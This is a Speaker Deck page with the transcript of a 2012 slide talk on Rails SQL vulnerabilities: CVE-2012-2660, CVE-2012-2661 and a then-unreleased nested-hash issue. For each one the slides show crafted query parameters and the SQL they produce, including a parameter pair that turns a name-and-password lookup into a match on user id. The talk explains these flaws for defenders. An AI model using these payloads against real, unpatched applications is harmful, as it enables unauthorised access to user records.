Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
"Recent Rails SQL Issues" - 2012
Search
Justin Collins
April 23, 2015
Programming
0
62
"Recent Rails SQL Issues" - 2012
Justin Collins
April 23, 2015
Tweet
Share
More Decks by Justin Collins
See All by Justin Collins
Continuous (Application) Security at DevOps Velocity
presidentbeef
0
120
The Evolution of Rails Security
presidentbeef
1
730
Brakeman RailsConf 2017 Lightning Talk
presidentbeef
0
110
Practical Static Analysis for Continuous Application Security
presidentbeef
0
160
"...But Doesn't Rails Take Care of Security for Me?"
presidentbeef
1
360
Continuous Security with Practical Static Analysis
presidentbeef
1
260
Security Automation at Twitter - Rise of the Machines
presidentbeef
0
190
The World of Rails Security - RailsConf 2015
presidentbeef
8
1.1k
Tales from the Crypt
presidentbeef
1
180
Other Decks in Programming
See All in Programming
ECS Service Connectのこれまでのアップデートと今後のRoadmapを見てみる
tkikuc
2
210
Vitest Browser Mode への期待 / Vitest Browser Mode
odanado
PRO
2
1.7k
アジャイルを支えるテストアーキテクチャ設計/Test Architecting for Agile
goyoki
7
2.8k
破壊せよ!データ破壊駆動で考えるドメインモデリング / data-destroy-driven
minodriven
16
4.1k
What’s New in Compose Multiplatform - A Live Tour (droidcon London 2024)
zsmb
1
350
GCCのプラグインを作る / I Made a GCC Plugin
shouth
1
150
Realtime API 入門
riofujimon
0
110
Googleのテストサイズを活用したテスト環境の構築
toms74209200
0
270
ECSのサービス間通信 4つの方法を比較する 〜Canary,Blue/Greenも添えて〜
tkikuc
11
2.3k
シールドクラスをはじめよう / Getting Started with Sealed Classes
mackey0225
3
400
『ドメイン駆動設計をはじめよう』のモデリングアプローチ
masuda220
PRO
8
440
/←このスケジュール表に立ち向かう フロントエンド開発戦略 / A front-end development strategy to tackle a single-slash schedule.
nrslib
1
590
Featured
See All Featured
Why You Should Never Use an ORM
jnunemaker
PRO
53
9k
Build your cross-platform service in a week with App Engine
jlugia
229
18k
Practical Tips for Bootstrapping Information Extraction Pipelines
honnibal
PRO
9
680
Making Projects Easy
brettharned
115
5.9k
[RailsConf 2023] Rails as a piece of cake
palkan
51
4.9k
The Cult of Friendly URLs
andyhume
78
6k
Writing Fast Ruby
sferik
626
61k
Making the Leap to Tech Lead
cromwellryan
132
8.9k
The Success of Rails: Ensuring Growth for the Next 100 Years
eileencodes
43
6.6k
Building Better People: How to give real-time feedback that sticks.
wjessup
363
19k
Adopting Sorbet at Scale
ufuk
73
9k
A Tale of Four Properties
chriscoyier
156
23k
Transcript
Rails Vulnerabilities Last Week CVE-2012-2660 CVE-2012-2661
CVE-2012-2660 Allows unexpected “IS NULL” in queries Affects Rails 2.x
and 3.x
ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end
Query Parameters ?name[] {"name"=>[nil]}
ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end
Resulting SQL SELECT "users".* FROM "users" WHERE "users"."name" IS NULL
CVE-2012-2661 Allows some manipulation of WHERE clause via “dotted” query
keys Affects Rails 3.x
ActiveRecord Query User.where(:name => params[:name])
ActiveRecord Query User.where("users.name" => params[:name])
Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}
ActiveRecord Query User.where(:name => {"users.id" => "1"})
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1
Unreleased Vulnerability Allows some manipulation of WHERE clause via nested
hashes in query values Affects 2.3.x and 3.x
ActiveRecord Query User.where(:name => params[:name], :password => params[:password])
Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}
ActiveRecord Query User.where( :name => {"users"=>{"id"=>"1"}, :password => {"users"=>{"id"=>"1"} )
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1 AND "users"."id" = 1